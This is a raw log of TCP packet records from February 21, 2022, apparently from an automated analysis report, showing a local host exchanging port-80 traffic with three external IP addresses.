                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.441384077 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.535262108 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.535434008 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.538887978 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.538904905 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.538954020 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.539340973 CET4981080192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.634351969 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.634407043 CET8049810185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.634577990 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.634705067 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.634792089 CET4981080192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.634835005 CET4981080192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.634875059 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.635091066 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.635164022 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.635211945 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.635446072 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.728060007 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.728111029 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.728144884 CET8049810185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.728176117 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.728302956 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.728418112 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.728591919 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.728606939 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.728673935 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.728707075 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.728950977 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.729120016 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.729449034 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.729482889 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.729515076 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.729640007 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.729821920 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.730259895 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.730413914 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.730498075 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.730590105 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.730823040 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.821775913 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.821824074 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.821971893 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.822103024 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.822429895 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.822527885 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.822561979 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.822648048 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.822658062 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.822760105 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.822793007 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.822824001 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.822841883 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.822909117 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.822941065 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.822972059 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.823024035 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.823199987 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.823365927 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.823684931 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.823822021 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.823853970 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.823940039 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.824009895 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.824026108 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.824068069 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.824100971 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.824206114 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.915074110 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.915148020 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.915400028 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.916384935 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.916434050 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.917398930 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.917783022 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.917845964 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.917881966 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.917912960 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.918029070 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.918431044 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.918476105 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.918507099 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.918538094 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.918566942 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.918597937 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.918627977 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.919792891 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.919837952 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.919869900 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.959844112 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:17.144095898 CET4981080192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:17.276916981 CET8049810185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:17.348095894 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:17.348244905 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:17.348268032 CET8049809185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:17.348516941 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:17.348539114 CET4980980192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:17.851248026 CET8049810185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:17.851315022 CET8049810185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:17.851619959 CET4981080192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:17.851680994 CET4981080192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.159193039 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.167289019 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.167778015 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.170118093 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.170196056 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.170336008 CET4981380192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.178347111 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.178391933 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.178558111 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.178626060 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.178668976 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180313110 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180381060 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180414915 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180444956 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180545092 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180565119 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180592060 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180629015 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180644035 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180695057 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180850029 CET804981334.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180864096 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.181056976 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.181154013 CET4981380192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.181205988 CET4981380192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.181211948 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.188517094 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.188585043 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.188618898 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.188648939 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.188828945 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.188911915 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.190445900 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.190547943 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.190629005 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.190632105 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.190829039 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.190840960 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.190900087 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.190943003 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.190983057 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191021919 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191165924 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191179037 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191241026 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191276073 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191314936 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191358089 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191409111 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191463947 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191500902 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191613913 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191628933 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191705942 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191741943 CET804981334.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191797972 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.191983938 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.198637962 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.198698997 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.198827028 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.198899984 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.198952913 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.198968887 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.199049950 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.199143887 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.199206114 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.199229956 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.199253082 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.199297905 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.199405909 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.199588060 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.200493097 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.200654984 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.200702906 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.200758934 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.200979948 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.201348066 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.201411009 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.201546907 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.201702118 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.201728106 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.201778889 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.201822996 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.201980114 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202030897 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202064037 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202086926 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202238083 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202264071 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202331066 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202373981 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202423096 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202433109 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202467918 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202522993 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202557087 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202588081 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202614069 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202738047 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202791929 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202821970 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202874899 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202924013 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202959061 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.202967882 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.203006029 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.203047037 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.203145981 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.203337908 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.203392982 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.203445911 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.203500032 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.203548908 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.203598976 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.203644037 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.208776951 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.208916903 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.209006071 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.209275961 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.209321022 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.209352970 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.209662914 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.209783077 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.209821939 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.209852934 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.209882975 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.209913015 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.212294102 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.215405941 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.221270084 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.278912067 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.278968096 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.279002905 CET804981234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.279576063 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.279654980 CET4981280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.287843943 CET804981334.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.287897110 CET804981334.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.288228989 CET4981380192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.288280010 CET4981380192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.298283100 CET804981334.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.299012899 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.469027042 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.469327927 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.471216917 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.471266031 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.471308947 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.471419096 CET4981580192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.641365051 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.641422033 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.641486883 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.641618967 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.641680956 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.641736984 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.641844034 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.641959906 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.642146111 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.646342039 CET804981545.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.646692038 CET4981580192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.646806002 CET4981580192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.811904907 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.811949968 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.812175989 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.812252045 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.812294006 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.812333107 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.812474012 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.812496901 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.812633038 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.812707901 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.812824965 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.812925100 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.813004971 CET804981445.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.813004971 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.813215971 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.813406944 CET4981480192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.821476936 CET804981545.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.982373953 CET804981445.195.115.71192.168.11.20
